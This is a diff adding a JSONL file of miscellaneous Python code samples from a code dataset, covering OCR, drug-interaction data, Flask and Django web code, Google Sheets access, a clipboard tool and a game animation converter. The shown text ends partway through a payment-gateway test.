diff --git "a/433.jsonl" "b/433.jsonl" new file mode 100644--- /dev/null +++ "b/433.jsonl" @@ -0,0 +1,700 @@ +{"seq_id":"138729633","text":"import argparse\r\nimport cv2\r\nfrom pyimagesearch.detector import detect_info\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport sys\r\n\r\n\r\ndef show_img(img):\r\n cv2.imshow('', img)\r\n cv2.waitKey(0)\r\n\r\n\r\ndef plot_img(img):\r\n plt.imshow(img)\r\n plt.show()\r\n\r\n\r\n\r\nimg = cv2.imread(\"./10.jpg\")\r\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n#plot_img(img)\r\n\r\n\r\n\r\n\r\n\r\nface, number_img, name_img, dob_img, gender_img, nation_img, \\\r\ncountry_img, address_img, country_img_list, address_img_list = detect_info(\r\n img)\r\n\r\n\r\n\r\nlist_image = [face, number_img, name_img, dob_img,\r\n gender_img, nation_img, country_img, address_img]\r\nj=0\r\nlist_label=[\"face\", \"number_img\", \"name_img\", \"dob_img\",\"gender_img\", \"nation_img\", \"country_img\", \"address_img\"]\r\nfor i in list_image:\r\n print(list_label[j])\r\n j=j+1\r\n show_img(i)\r\n\r\n\r\n","sub_path":"IDCard Detector and Recognition/OCR-fake.py","file_name":"OCR-fake.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"137211975","text":"import os\nimport json\nfrom pandas.core.frame import DataFrame\n\ndrugs_ddi_path = '/data/DrugData/Drugs/data/'\nwarfarin_path = drugs_ddi_path + 'Warfarin/Warfarin_inter.json'\n\nddi_list = []\nddi_list_check = []\ndrug_list = []\n\nwith open(warfarin_path,'r') as load_f:\n warfarin_dict = json.load(load_f)\n\ninter_list = warfarin_dict['Drug Interactions']['inter_list']\nfor i in inter_list:\n drug_list.append(i[1])\n ddi_list.append(['warfarin', i[1], i[0]])\n \ng = os.walk(drugs_ddi_path) \nfor path,dir_list,file_list in g: \n for dir_name in dir_list:\n if(dir_name.lower() in drug_list):\n drug_ddi_file = os.path.join(path, dir_name) + '/' + dir_name + '_inter.json'\n try:\n with open(drug_ddi_file,'r') as load_drug:\n drug_dict = json.load(load_drug) \n for i in drug_dict['Drug Interactions']['inter_list']:\n if(i[1] in drug_list):\n new_list = [dir_name.lower(), i[1]]\n new_list.sort()\n \n if(new_list in ddi_list_check):\n continue\n else:\n ddi_list_check.append(new_list)\n ddi_list.append([dir_name.lower(), i[1], i[0]]) \n \n except FileNotFoundError:\n pass\n\ndata = DataFrame(ddi_list)\ndata.to_csv(\"warfarin_ddi.csv\")\n\ndrug_dict = {}\ndrug_dict['warfarin'] = 0\nfor i in range(0,len(drug_list)):\n drug_dict[drug_list[i]] = i\n\nnew_drug_list = []\nnew_drug_list.append('warfarin')\nfor i in drug_list:\n new_drug_list.append(i)\npd1_list = []\npd2_list = []\nfor i in ddi_list:\n pd1_list.append([drug_dict[i[0]], drug_dict[i[1]], i[2]])\nlabel_list = []\nlabel_list.append(1)\nfor i in drug_list:\n label_list.append(0)\nfor i in range(0,len(new_drug_list)):\n pd2_list.append([new_drug_list[i], label_list[i], label_list[i]])","sub_path":"warfarin-demo/warfarin-demo.py","file_name":"warfarin-demo.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"7804849","text":"# type: ignore\n# silence mypy for the routes file\nimport os\nimport urllib.parse\nfrom typing import Any\n\nfrom flask import (\n Blueprint,\n abort,\n current_app,\n jsonify,\n redirect,\n request,\n send_from_directory,\n)\n\nfrom application import cache\nfrom application.database import db\nfrom application.defs import cre_defs as 
defs\n\nITEMS_PER_PAGE = 20\n\napp = Blueprint(\"web\", __name__, static_folder=\"../frontend/www\")\n\n\ndef extend_cre_with_tag_links(\n cre: defs.CRE, collection: db.Standard_collection\n) -> defs.CRE:\n others = []\n # for each tag: get by tag, append results as \"RELATED TO\" links\n for tag in cre.tags:\n others.extend(collection.get_by_tags([tag]))\n others = list(frozenset(others))\n for o in others:\n o.links = []\n cre.add_link(defs.Link(ltype=defs.LinkTypes.Related, document=o))\n return cre\n\n\n@app.route(\"/rest/v1/id/\", methods=[\"GET\"])\n@cache.cached(timeout=50)\ndef find_by_id(creid: str) -> Any: # refer\n\n database = db.Standard_collection()\n include_only = request.args.getlist(\"include_only\")\n cre = database.get_CREs(external_id=creid, include_only=include_only)[0]\n\n if cre:\n # disable until we have a consensus on tag behaviour\n # cre = extend_cre_with_tag_links(cre=cre, collection=database)\n return jsonify({\"data\": cre.todict()})\n abort(404)\n\n\n@app.route(\"/rest/v1/name/\", methods=[\"GET\"])\n@cache.cached(timeout=50)\ndef find_by_name(crename: str) -> Any:\n\n database = db.Standard_collection()\n cre = database.get_CREs(name=crename)[0]\n if cre:\n cre = extend_cre_with_tag_links(cre=cre, collection=database)\n return jsonify(cre.todict())\n abort(404)\n\n\n@app.route(\"/rest/v1/standard/\", methods=[\"GET\"])\n# @cache.cached(timeout=50)\ndef find_standard_by_name(sname: str) -> Any:\n database = db.Standard_collection()\n opt_section = request.args.get(\"section\")\n if opt_section:\n opt_section = urllib.parse.unquote(opt_section)\n opt_subsection = request.args.get(\"subsection\")\n opt_hyperlink = request.args.get(\"hyperlink\")\n page = 1\n if request.args.get(\"page\") is not None and int(request.args.get(\"page\")) > 0:\n page = request.args.get(\"page\")\n items_per_page = request.args.get(\"items_per_page\") or ITEMS_PER_PAGE\n\n include_only = request.args.getlist(\"include_only\")\n\n total_pages, standards, _ = database.get_standards_with_pagination(\n name=sname,\n section=opt_section,\n subsection=opt_subsection,\n link=opt_hyperlink,\n page=int(page),\n items_per_page=int(items_per_page),\n include_only=include_only,\n )\n result = {}\n result[\"total_pages\"] = total_pages\n result[\"page\"] = page\n if standards:\n res = [stand.todict() for stand in standards]\n result[\"standards\"] = res\n return jsonify(result)\n abort(404)\n\n\n# TODO: (spyros) paginate\n@app.route(\"/rest/v1/tags\", methods=[\"GET\"])\n@cache.cached(timeout=50)\ndef find_document_by_tag(sname: str) -> Any:\n database = db.Standard_collection()\n tags = request.args.getlist(\"tag\")\n documents = database.get_by_tags(tags)\n if documents:\n res = [doc.todict() for doc in documents]\n return jsonify(res)\n\n\n@app.route(\"/rest/v1/gap_analysis\", methods=[\"GET\"])\n@cache.cached(timeout=50)\ndef gap_analysis() -> Any: # TODO (spyros): add export result to spreadsheet\n database = db.Standard_collection()\n standards = request.args.getlist(\"standard\")\n documents = database.gap_analysis(standards=standards)\n if documents:\n res = [doc.todict() for doc in documents]\n return jsonify(res)\n\n\n@app.route(\"/rest/v1/text_search\", methods=[\"GET\"])\n# @cache.cached(timeout=50)\ndef text_search() -> Any:\n \"\"\"\n Performs arbitrary text search among all known documents.\n Formats supported:\n * 'CRE:' will search for the in cre ids\n * 'CRE:' will search for the in cre names\n * 'Standard:[:
:subsection]' will search for\n all entries of and optionally, section/subsection\n * '\\d\\d\\d-\\d\\d\\d' (two sets of 3 digits) will first try to match\n CRE ids before it performs a free text search\n Anything else will be a case insensitive LIKE query in the database\n \"\"\"\n database = db.Standard_collection()\n text = request.args.get(\"text\")\n documents = database.text_search(text)\n if documents:\n res = [doc.todict() for doc in documents]\n return jsonify(res)\n else:\n abort(404)\n\n\n@app.errorhandler(404)\ndef page_not_found(e) -> Any:\n # Even though Flask logs it by default,\n # I prefer to have a logger dedicated to 404\n return \"Resource Not found\", 404\n\n\n# If no other routes are matched, serve the react app, or any other static files (like bundle.js)\n@app.route(\"/\", defaults={\"path\": \"\"})\n@app.route(\"/\")\n# @cache.cached(timeout=50)\ndef index(path: str) -> Any:\n if path != \"\" and os.path.exists(app.static_folder + \"/\" + path):\n return send_from_directory(app.static_folder, path)\n else:\n return send_from_directory(app.static_folder, \"index.html\")\n\n\n@app.before_request\ndef before_request():\n if current_app.config[\"ENVIRONMENT\"] != \"PRODUCTION\":\n return\n\n if not request.is_secure:\n print(\"https redir\")\n url = request.url.replace(\"http://\", \"https://\", 1)\n code = 301\n return redirect(url, code=code)\n\n\n@app.after_request\ndef add_header(response):\n response.cache_control.max_age = 300\n return response\n\n\nif __name__ == \"__main__\":\n app.run(use_reloader=False, debug=False)\n","sub_path":"application/web/web_main.py","file_name":"web_main.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"97425703","text":"from pprint import pprint\n\nimport httplib2\nimport apiclient.discovery\nfrom oauth2client.service_account import ServiceAccountCredentials\n\n\n# Файл, полученный в Google Developer Console\nCREDENTIALS_FILE = 'creds.json'\n# ID Google Sheets документа (можно взять из его URL)\nspreadsheet_id = '1JdPwwwaUnqv2WYVVn9DQeFIu017zWHh7Go5dMQvLEek'\n\n# Авторизуемся и получаем service — экземпляр доступа к API\ncredentials = ServiceAccountCredentials.from_json_keyfile_name(\n CREDENTIALS_FILE,\n ['https://www.googleapis.com/auth/spreadsheets',\n 'https://www.googleapis.com/auth/drive'])\nhttpAuth = credentials.authorize(httplib2.Http())\nservice = apiclient.discovery.build('sheets', 'v4', http = httpAuth)\n\n\n\n# Пример чтения файла\nvalues = service.spreadsheets().values().get(\n spreadsheetId=spreadsheet_id,\n range='ЛИСТ1',\n majorDimension='COLUMNS'\n).execute()\npprint(values)\ncell_list = values['values']\nprint(cell_list)\ncells = cell_list[0]\nprint(cells)\ncell = len(cells)\nprint(cell)\n\ndef sheet_write(data):\n values = service.spreadsheets().values().batchUpdate(\n spreadsheetId=spreadsheet_id,\n body={\n \"valueInputOption\": \"USER_ENTERED\",\n \"data\": [\n {\"range\": \"ЛИСТ1!A\"+str(cell+1),\n \"majorDimension\": \"ROWS\",\n \"values\": [[data[0], data[1],data[2],data[3],data[4],data[5],data[6],data[7],data[8],data[8]]]}\n ]\n }\n ).execute()\n return","sub_path":"func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"414139927","text":"# Copyright 2015 The Chromium Authors. 
All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport errno\nimport imp\nimport os.path\nimport sys\n\n\ndef _GetDirAbove(dirname):\n  \"\"\"Returns the directory \"above\" this file containing |dirname| (which must\n  also be \"above\" this file).\"\"\"\n  path = os.path.abspath(__file__)\n  while True:\n    path, tail = os.path.split(path)\n    assert tail\n    if tail == dirname:\n      return path\n\n\ndef EnsureDirectoryExists(path, always_try_to_create=False):\n  \"\"\"A wrapper for os.makedirs that does not error if the directory already\n  exists. A different process could be racing to create this directory.\"\"\"\n\n  if not os.path.exists(path) or always_try_to_create:\n    try:\n      os.makedirs(path)\n    except OSError as e:\n      # There may have been a race to create this directory.\n      if e.errno != errno.EEXIST:\n        raise\n\n\ndef EnsureModuleAvailable(module_name):\n  \"\"\"Helper function which attempts to find the Python module named\n  |module_name| using the usual module search. If that fails, this assumes it's\n  being called within the Chromium tree, or an equivalent tree where this\n  library lives somewhere under a \"mojo\" directory which has a \"third_party\"\n  sibling.\"\"\"\n  try:\n    imp.find_module(module_name)\n  except ImportError:\n    sys.path.append(os.path.join(_GetDirAbove(\"mojo\"), \"third_party\"))\n","sub_path":"mojo/public/tools/mojom/mojom/fileutil.py","file_name":"fileutil.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"283327423","text":"#!/usr/bin/python\n# author: Jan Hybs\n\n\nimport os\n\n\nclass ProjectStepGit(object):\n    \"\"\"\n    Simple class holding git specification\n    \"\"\"\n    def __init__(self, **kwargs):\n        self.url = kwargs['url']\n        self.repo = str(os.path.basename(self.url).split('.')[0])\n        self.remove_before_checkout = kwargs.get('remove-before-checkout', False)\n        self.branch = kwargs.get('branch', 'master')\n        self.commit = kwargs.get('commit', '')","sub_path":"ci-hpc/structures/project_step_git.py","file_name":"project_step_git.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"114883914","text":"#!/usr/bin/env python3\n\nimport requests\n\n# download current go.obo file\ngo_obo_url = 'http://current.geneontology.org/ontology/go.obo'\n\nreq = requests.get(go_obo_url, stream=True, verify=False)\nhandle = open('./data/go.obo', 'wb')\n\nfor chunk in req.iter_content(chunk_size=512):\n    if chunk:\n        handle.write(chunk)\nhandle.close()\n\n","sub_path":"get_gene_ontology_data.py","file_name":"get_gene_ontology_data.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"370318074","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.contrib.auth.models import User\nfrom django.core.validators import RegexValidator\nfrom django.utils.translation import ugettext as _\n\nfrom django.db import models\n\nphone_regex = RegexValidator(\n    regex=r'^\\+?1?\\d{9,15}$',\n    message=_(\n        u'Номер телефона должен быть введен в формате: «+999999999». 
'\n u'Допускается до 15 цифр.'\n )\n)\n\n\nclass PositionEnum(object):\n \"\"\"\n Коллекция должностей\n \"\"\"\n ADMINISTRATOR, ANALYST, AUDITOR, AUCTIONEER, STOCKBROKER = range(0, 5)\n TRADER, ACCOUNTANT, ACCOUNTANT_AUDITOR, DEALER, DISPATCHER = range(5, 10)\n DERMATOLOGIST, ENGINEER, BROKER = range(11, 14)\n\n values = {\n ADMINISTRATOR: _(u'Администратор'),\n ANALYST: _(u'Аналитик'),\n AUDITOR: _(u'Аудитор'),\n AUCTIONEER: _(u'Аукционист'),\n STOCKBROKER: _('Биржевой маклер'),\n TRADER: _('Биржевик'),\n ACCOUNTANT: _(u'Бухгалтер'),\n ACCOUNTANT_AUDITOR: _(u'Бухгалтер-аудитор'),\n DEALER: _(u'Дилер'),\n DISPATCHER: _(u'Диспетчер'),\n DERMATOLOGIST: _(u'Документовед'),\n ENGINEER: _(u'Инженер'),\n BROKER: _('Брокер'),\n }\n\n\nclass Department(models.Model):\n u\"\"\"\n Модель отделов\n \"\"\"\n code = models.CharField(max_length=30, null=True, blank=True)\n name = models.CharField(max_length=30, null=True, blank=True)\n\n def __unicode__(self):\n return self.name\n\n\nclass Employees(User):\n u\"\"\"\n Модель сотрудников\n \"\"\"\n\n patronymic = models.CharField(\n _(u'Отчество'), max_length=30, null=True, blank=True\n )\n date_birth = models.DateField(_(u'Дата рождения'))\n employment_date = models.DateField(\n _(u'Дата приема на рабоу'), blank=True, null=True\n )\n date_of_dismissal = models.DateField(\n _(u'Дата увольнения'), blank=True, null=True\n )\n\n phone_number = models.CharField(\n max_length=15, validators=[phone_regex], blank=True\n )\n department = models.ForeignKey(\n Department, verbose_name=_(u'отдел'), null=True,\n blank=True, db_index=True\n )\n position = models.SmallIntegerField(\n choices=PositionEnum.values.items()\n )\n\n @property\n def fullname(self):\n return u' '.join(\n [\n self.last_name or u'',\n self.first_name or u'',\n self.patronymic or u''\n ]\n )\n\n @property\n def position_display(self):\n return PositionEnum.values.get(self.position, None)\n\n User._meta.get_field('first_name').verbose_name = _(u'Имя')\n User._meta.get_field('last_name').verbose_name = _(u'Фамилия')\n User._meta.get_field('is_staff').help_text = _(\n 'Указывыет может ли полльзователь регистрироваться '\n 'на административном ресурсе'\n )\n User._meta.get_field('is_active').help_text = _(\n 'Указывыет является ли учетная запись действущей'\n )\n","sub_path":"employees/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"549713898","text":"\nfrase = 'PrOgRaMaMoS em python!'\n\ndef maiusculas(frase):\n i = 0\n a = 0\n m = ''\n\n for x in frase:\n #print(texto[i])\n if frase[i].isupper():\n m = m + frase[i]\n i = i + 1\n\n return(m)\n","sub_path":"maiusculas.py","file_name":"maiusculas.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"311220342","text":"import os\nimport re\nimport unittest\nimport xml.etree.ElementTree as ET\n\nclass RynnConverter(object):\n\n bones = None\n animations = None\n name = None\n\n def __init__(self, drakan_model_path):\n self.bones = []\n self.set_bones(drakan_model_path)\n\n def set_bones(self, file):\n with open(file) as inp:\n nodes = False\n\n for line in inp:\n line = line.strip()\n if 'nodes [' in line:\n nodes = True\n if nodes and ']' == line:\n return\n if nodes:\n name = re.search('(\\\\d+)\\s+name=\"(.+?)\"', line)\n if name:\n print('Found Node %s named %s' % (name.groups()[0], name.groups(1)))\n # self.bones[] =\n 
self.bones.insert(int(name.groups()[0]), name.groups()[1])\n\n def get_animations(self, path_to_file, name):\n self.name = name\n\n animations = []\n if not os.path.isfile(path_to_file):\n raise IOError('not a file %s' % path_to_file)\n\n with open(path_to_file) as in_file:\n current_bone = None\n for line in in_file:\n if line.count('Node') > 0:\n number = re.search('Node (\\\\d+)', line)\n if number:\n current_bone = self.BoneAnimation(self.bones[int(number.groups()[0])])\n print('Bone %s' % current_bone.name)\n animations.append(current_bone)\n else:\n data = re.findall('(-?\\\\d+\\\\.\\\\d+)', line)\n if data and current_bone:\n current_bone.timestamps.append(data[0])\n an = []\n an.append(data[1])\n an.append(data[4])\n an.append(data[7])\n an.append(data[10] + \"\\n\")\n an.append(data[2])\n an.append(data[5])\n an.append(data[8])\n an.append(data[11] + \"\\n\")\n an.append(data[3])\n an.append(data[6])\n an.append(data[9])\n an.append(data[12] + \"\\n\")\n\n #=======================\n\n an = an + ['0', '0', '0', '1']\n\n current_bone.animations.append(an)\n\n self.animations = animations\n\n\n\n class BoneAnimation(object):\n\n timestamps = None\n animations = None\n name = None\n\n def __init__(self, name):\n self.timestamps = []\n self.animations = []\n self.name = name\n\nclass TestRynn(unittest.TestCase):\n\n def setUp(self):\n self.Rynn = RynnConverter(r'C:\\Games\\Drakan_ed\\Psygnosis\\Drakan\\Drakan Dump\\Common\\System' +\n r'\\System [root]\\Rynn\\Singleplayer\\Model3713 leather armor(h).txt')\n\n def test_wrynn(self):\n self.assertEquals(self.Rynn.bones[0], 'wrynn')\n\n def test_upperbody(self):\n self.assertEquals(self.Rynn.bones[1], 'upperbody')\n\n def test_lowerbody(self):\n self.assertEquals(self.Rynn.bones[20], 'lowerbody')\n\n def test_Ltoe(self):\n self.assertEquals(self.Rynn.bones[31], 'Ltoe')\n\n def test_Lsheath(self):\n self.assertEquals(self.Rynn.bones[32], 'Lsheath')\n\n def test_len(self):\n self.assertEquals(len(self.Rynn.bones), 33)\n\n\ndef indent(elem, level=0):\n i = \"\\n\" + level*\" \"\n if len(elem):\n if not elem.text or not elem.text.strip():\n elem.text = i + \" \"\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n for elem in elem:\n indent(elem, level+1)\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n else:\n if level and (not elem.tail or not elem.tail.strip()):\n elem.tail = i\n\ndef create_animation_tag(animation_clip_name, animation):\n \"\"\"\n Create tag for a single track\n :param animation_clip_name: name for animation (which can comprise multiple tracks)\n :param animation: BoneAnimation object\n :return:\n \"\"\"\n fullname = animation_clip_name + '_' + animation.name\n animation_tag = ET.Element('animation')\n animation_tag.set('id', fullname)\n source_input = ET.SubElement(animation_tag, 'source')\n source_input.set('id', fullname + '-input')\n source_output = ET.SubElement(animation_tag, 'source')\n source_output.set('id', fullname + '-output')\n source_interpolation = ET.SubElement(animation_tag, 'source')\n source_interpolation.set('id', fullname + '-interpolation')\n sampler = ET.SubElement(animation_tag, 'sampler')\n sampler.set('id', fullname + '-sampler')\n channel = ET.SubElement(animation_tag, 'channel')\n channel.set('source', '#' + sampler.get('id'))\n channel.set('target', 'Armature_%s/transform' % animation.name)\n\n input_array = ET.SubElement(source_input, 'float_array')\n input_array.set('id', fullname + '-input-array')\n input_array.set('count', str(len(animation.timestamps)))\n 
input_array.text = '\\n' + '\\n'.join(animation.timestamps) + '\\n'\n\n input_technique_common = ET.SubElement(source_input, 'technique_common')\n input_accessor = ET.SubElement(input_technique_common, 'accessor')\n input_accessor.set('source', '#' + input_array.get('id'))\n input_accessor.set('count', str(len(animation.timestamps)))\n input_accessor.set('stride', '1')\n\n input_accessor_param = ET.SubElement(input_accessor, 'param')\n input_accessor_param.set('name', 'TIME')\n input_accessor_param.set('type', 'float')\n\n output_array = ET.SubElement(source_output, 'float_array')\n output_array.set('id', fullname + '-output-array')\n output_array.set('count', str(len(animation.timestamps) * 16))\n output_array.text = '\\n'\n for an in animation.animations:\n output_array.text += ' '.join(an) + '\\n'\n\n output_technique_common = ET.SubElement(source_output, 'technique_common')\n output_accessor = ET.SubElement(output_technique_common, 'accessor')\n output_accessor.set('source', '#' + output_array.get('id'))\n output_accessor.set('count', str(len(animation.timestamps) * 16))\n output_accessor.set('stride', '16')\n\n output_accessor_param = ET.SubElement(output_accessor, 'param')\n output_accessor_param.set('name', 'TRANSFORM')\n output_accessor_param.set('type', 'float4x4')\n\n interpolation_array = ET.SubElement(source_interpolation, 'Name_array')\n interpolation_array.set('id', source_interpolation.get('id') + '-array')\n interpolation_array.set('count', str(len(animation.timestamps)))\n nametext = 'LINEAR ' * len(animation.timestamps) # WORNG ELEMENTS NUMER IS PRINTED. NOT COUNT, TEXT!\n interpolation_array.text = '\\n' + '\\n'.join(nametext.split(' '))\n\n interpolation_technique_common = ET.SubElement(source_interpolation, 'technique_common')\n interpolation_accessor = ET.SubElement(interpolation_technique_common, 'accessor')\n interpolation_accessor.set('source', '#' + interpolation_array.get('id'))\n interpolation_accessor.set('count', str(len(animation.timestamps)))\n interpolation_accessor.set('stride', '1')\n\n interpolation_accessor_param = ET.SubElement(interpolation_accessor, 'param')\n interpolation_accessor_param.set('name', 'INTERPOLATION')\n interpolation_accessor_param.set('type', 'name')\n\n sampler_input = ET.SubElement(sampler, 'input')\n sampler_input.set('semantic', 'INPUT')\n sampler_input.set('source', '#' + source_input.get('id'))\n sampler_output = ET.SubElement(sampler, 'input')\n sampler_output.set('semantic', 'OUTPUT')\n sampler_output.set('source', '#' + source_output.get('id'))\n sampler_interpolation = ET.SubElement(sampler, 'input')\n sampler_interpolation.set('semantic', 'INTERPOLATION')\n sampler_interpolation.set('source', '#' + source_interpolation.get('id'))\n\n indent(animation_tag)\n return fullname, animation_tag\n\n\ndef create_animation_clip(name, tracks, start=0, end=0.0):\n \"\"\"\n Generate tags for each track for \n and an for \n :param name: name of animation clip (will be used in animations names)\n :param tracks: list with BoneAnimation objects\n :param start: (double) start time in seconds. 0 by default\n :param end: (double) stop time in seconds. 0 by default. 
If not specified, the longest track last timestamp will be taken\n :return: elementTree , ElementTree [] list\n \"\"\"\n animation_tags = []\n\n clip_tag = ET.Element('{http://www.collada.org/2005/11/COLLADASchema}animation_clip')\n clip_tag.set('id', name)\n clip_tag.set('name', name)\n\n\n for anim in tracks:\n an_name, an_tag = create_animation_tag(name, anim)\n animation_tags.append(an_tag)\n # print(ET.tostring(an_tag))\n\n instance = ET.SubElement(clip_tag, '{http://www.collada.org/2005/11/COLLADASchema}instance_animation')\n instance.set('url', \"#\" + an_name)\n\n animation_length = float(anim.timestamps[-1])\n if animation_length > end:\n if end == 0.0:\n end = animation_length\n else:\n raise ValueError('Found a track with last timestamp %s for %s track larger then stop provided %s' %\n (animation_length, anim.name, end))\n\n clip_tag.set('start', str(start))\n clip_tag.set('end', str(end))\n indent(clip_tag)\n print(ET.tostring(clip_tag))\n return clip_tag, animation_tags\n\n\ndef add_animations_to_file(input_file, output_file, animation_tags, animation_clip_tag,\n clear_animations=True, clear_clips = False):\n # Open original file\n ET.register_namespace('', \"http://www.collada.org/2005/11/COLLADASchema\")\n et = ET.parse(input_file)\n root = et.getroot()\n library_animations = root.findall(\"{http://www.collada.org/2005/11/COLLADASchema}library_animations\")\n\n if not library_animations:\n library_animations = ET.SubElement(root, '{http://www.collada.org/2005/11/COLLADASchema}library_animations')\n else:\n library_animations = library_animations[0]\n\n library_animation_clips = root.findall(\"{http://www.collada.org/2005/11/COLLADASchema}library_animation_clips\")\n\n if not library_animation_clips:\n library_animation_clips = ET.SubElement(root, '{http://www.collada.org/2005/11/COLLADASchema}library_animation_clips')\n else:\n library_animation_clips = library_animation_clips[0]\n\n library_animation_clips.append(animation_clip_tag)\n indent(library_animation_clips)\n\n for tag in animation_tags:\n library_animations.append(tag)\n indent(library_animations)\n # Write back to file\n\n et.write(output_file, encoding='utf-8', xml_declaration=True)\n # et.write(output_file, xml_declaration=True)\n\n\nif __name__ == '__main__':\n conv = RynnConverter(r'C:\\Games\\Drakan_ed\\Psygnosis\\Drakan\\Drakan Dump\\Common\\System' +\n r'\\System [root]\\Rynn\\Singleplayer\\Model3713 leather armor(h).txt')\n # drakan_animation_file = r'C:\\Games\\Drakan_ed\\Psygnosis\\Drakan\\Drakan Dump\\Common\\System\\System [root]\\Animations\\Anim470 balance.txt'\n # drakan_animation_file = r'C:\\Games\\Drakan_ed\\Psygnosis\\Drakan\\Drakan Dump\\Common\\System\\System [root]\\Animations\\Anim649 runeblade.txt'\n drakan_animation_file = r'C:\\Games\\Drakan_ed\\Psygnosis\\Drakan\\Drakan Dump\\Common\\System\\System [root]\\Animations\\Anim675 run1h.txt'\n # drakan_animation_file = r'C:\\Games\\Drakan_ed\\Psygnosis\\Drakan\\Drakan Dump\\Common\\System\\System [root]\\Animations\\Anim560 ride.txt'\n name = 'RUN'\n output_file = 'tmp'\n # input_dae_file = r\"C:\\GoDot\\Projects\\GoDrak\\Models\\Player_leather\\leather_animatied.dae\"\n input_dae_file = r\"C:\\GoDot\\Projects\\GoDrak\\Models\\Player_leather\\leather.dae\"\n output_dae_file = r\"C:\\GoDot\\Projects\\GoDrak\\Models\\Player_leather\\leather_animatied.dae\"\n\n conv.get_animations(drakan_animation_file, name)\n clip_tag, animation_tags = create_animation_clip(conv.name, conv.animations)\n\n add_animations_to_file(input_dae_file, 
output_dae_file, animation_tags, clip_tag)\n\n\n\n\n\n","sub_path":"Tools/Amination_converter.py","file_name":"Amination_converter.py","file_ext":"py","file_size_in_byte":12330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"49739367","text":"# Overview: saves clipboard contents into a shelve file, implementing a multi-slot clipboard\n# Usage: • provide a command-line argument for the keyword to look up.\n#      • if the argument is save, save the clipboard contents under the keyword. python mcb.py save \n#      • if the argument is list, copy all keywords to the clipboard.\n#      • otherwise, copy the text stored under the keyword to the clipboard.\n\nimport sys, shelve, pyperclip\n\nmcbShelf = shelve.open('mcb')\n# save clipboard contents\nif len(sys.argv) == 3 and sys.argv[1].lower() == 'save':\n    mcbShelf[sys.argv[2]] = pyperclip.paste()\n    print('Saved')\n# list clipboard keywords\nelif len(sys.argv) == 2:\n    if sys.argv[1].lower() == 'list':\n        print('All keywords:')\n        print(str(list(mcbShelf.keys())))\n    elif sys.argv[1] in mcbShelf:\n        pyperclip.copy(str(mcbShelf[sys.argv[1]]))\n        print('Copied ' + sys.argv[1] + ' to the clipboard')\n        print('Contents:')\n        print(str(mcbShelf[sys.argv[1]]))\n\nmcbShelf.close()","sub_path":"code/mcb.py","file_name":"mcb.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"174235420","text":"import matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.pylab import *\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport numpy as np\nfrom scipy.optimize import curve_fit\n\n#%matplotlib inline\nproc = [1,2,4]\nmode = [1,2,3]\n\ntime1 = loadtxt(str(\"time1.dat\"), unpack = True)\ntime2 = loadtxt(str(\"time2.dat\"), unpack = True)\ntime4 = loadtxt(str(\"time4.dat\"), unpack = True)\n\ntimes=[time1,time2,time4]\nfig2 = plt.figure(figsize=(7,7))\nax2 = plt.gca()\nplt.plot(proc,times,'o',markersize=10,color = (1,1,0))\nplt.title('No. Proc. vs. 
time')\nplt.xlabel('# proc.')\nplt.xlim(0,5)\nplt.ylim(np.min(times)-5,np.max(times)+5)\nplt.grid(True)\nplt.ylabel('time [s]')\nplt.savefig('Nvst.pdf')\n\ndata=[1,2,4]\n\nfor i in data:\n filename=\"data\"+str(i)+\".dat\"\n time, e1, e2, e3 = np.loadtxt(str(filename), unpack = True)\n fig = plt.figure()\n ax = plt.gca()\n plt.plot(time,e1,'*',color = (1,1,0),label='mode: 1')\n plt.plot(time,e2,'x',color = (0,1,1),label='mode: 2')\n plt.plot(time,e3,'+',color = (1,0,1),label='mode: 3')\n plt.legend() \n plt.title('Energy Evolution')\n plt.xlabel('Steps on time')\n plt.ylabel('Energy')\n plt.grid(True)\n plt.savefig('Energy_nproc'+str(i)+'.pdf')\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"189376132","text":"from faker import Factory\nfrom hamcrest import assert_that, instance_of, equal_to\n\nfrom data.xml_requests import securecard_registration, payment_securecard, payment_avs\nfrom model.gateway import PAYMENTRESPONSE, SECURECARDREGISTRATIONRESPONSE, REFUNDRESPONSE\nfrom wnclient import WNClient\n\nfake = Factory.create()\n\nwn = WNClient().hound.go\nTERM_ID = '352008'\n\n\ndef test_paysafe_securecard_payment_ok():\n securecard = securecard_registration()\n\n sc_response = wn.xml(TERM_ID).secure_card_registration(securecard)\n assert_that(sc_response, instance_of(SECURECARDREGISTRATIONRESPONSE))\n\n p = 